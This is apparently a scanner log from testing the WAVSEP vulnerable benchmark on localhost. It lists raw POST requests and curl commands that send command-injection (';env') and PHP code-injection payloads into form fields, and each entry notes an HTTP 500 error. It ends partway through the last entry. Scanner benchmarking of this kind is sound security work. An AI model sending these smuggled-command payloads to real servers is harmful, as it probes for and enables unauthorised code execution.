POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp" -d "username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=letmein"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp" -d "msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp" -d "username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp" -d "msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -d "msgId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -d "msgid=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -d "transactionDate=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -d "msgId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -d "msgid=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp" -d "username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=letmein"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp" -d "msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp" -d "username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp" -d "msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -d "msgId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -d "msgid=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Benv
